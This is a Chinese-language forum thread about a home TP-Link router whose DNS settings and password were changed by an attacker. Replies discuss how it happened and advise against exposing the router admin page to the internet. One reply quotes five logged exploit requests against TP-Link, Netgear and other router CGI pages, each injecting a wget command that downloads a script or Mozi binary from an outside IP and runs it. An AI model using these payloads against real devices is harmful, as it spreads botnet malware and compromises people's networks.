V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
programApe
V2EX  ›  宽带症候群

国庆回老家突然发现路由器下发了恶意的 dns

  •  
  •   programApe · 5 天前 · 3492 次点击

    路由器是 TP-LINK,路由器密码也不是我以前记的那个了。

    16 条回复    2025-10-07 20:36:29 +08:00
    anson264556364
        1
    anson264556364  
       5 天前
    然后呢?
    programApe
        2
    programApe  
    OP
       5 天前
    @anson264556364 密码和以前设置的不一样了,等晚上亲戚回去把设备重置下看看,感觉可能是 tp-link 远程管理有漏洞。
    allplay
        3
    allplay  
       5 天前 via Android
    tp link 远程管理?你从 wan 口进入?
    这是找死,迟早的事
    allplay
        4
    allplay  
       5 天前 via Android
    应该 vpn 或者内网穿透,然后 lan 设备去管理它
    shum02
        5
    shum02  
       5 天前
    以前遇到过家里的 padavan 被恶意改了 DNS ,公网进去改的应该是。
    xyz3210
        6
    xyz3210  
       5 天前
    我是桥接的!
    ks3825
        7
    ks3825  
       5 天前 via Android
    @shum02 查到原因了吗?弱口令?
    2397613259qqq
        8
    2397613259qqq  
       5 天前
    从外回家管理路由最佳实践是 vpn ,或者 ssh tunnel ,不要直接暴露管理入口在公网上,路由器这种东西没有及时更新很容易被滥用
    dpx
        9
    dpx  
       5 天前
    服务器经常会收到一些利用漏洞攻击路由器的请求如
    /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh)

    /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://49.130.26.13:39255/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

    /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26

    /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27
    shum02
        10
    shum02  
       4 天前
    @ks3825 没,我觉得是弱口令被爆破,padavan 那个认证也没有安全限制的,可以一直爆破
    titanium98118
        11
    titanium98118  
       4 天前 via Android
    80 端口能通吗?
    programApe
        12
    programApe  
    OP
       3 天前
    @titanium98118 不通,老家的网,没弄公网 ip 、没 ipv6 、没桥接。可能的原因是 tp-link 的那个物联 app 管理,或者是装宽带的小哥干的?目前也只有这两种可能性了。
    ks3825
        13
    ks3825  
       3 天前 via Android
    @shum02 是把路由器登陆界面开放给公网了吗?正常是没爆破机会的啊。而且 web 界面暴露出去还有概率被运营商发函警告
    shum02
        14
    shum02  
       2 天前
    @ks3825 嗯,以前是开了的,我这不管的,反正以前的联通和移动公网都是不管开 web 的
    ks3825
        15
    ks3825  
       2 天前 via Android
    @shum02 还是关上吧,太哈人了,padavan 也不算是大型的积极被维护的项目,保不准有什么漏洞,直接向公网开放端口太危险了
    aru
        16
    aru  
       1 天前
    似乎某些路由器固件有漏洞
    当你访问恶意网站的时候会被上面的脚本发起内网 http 请求修改路由器配置
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   5515 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 32ms · UTC 01:58 · PVG 09:58 · LAX 18:58 · JFK 21:58
    ♥ Do have faith in what you're doing.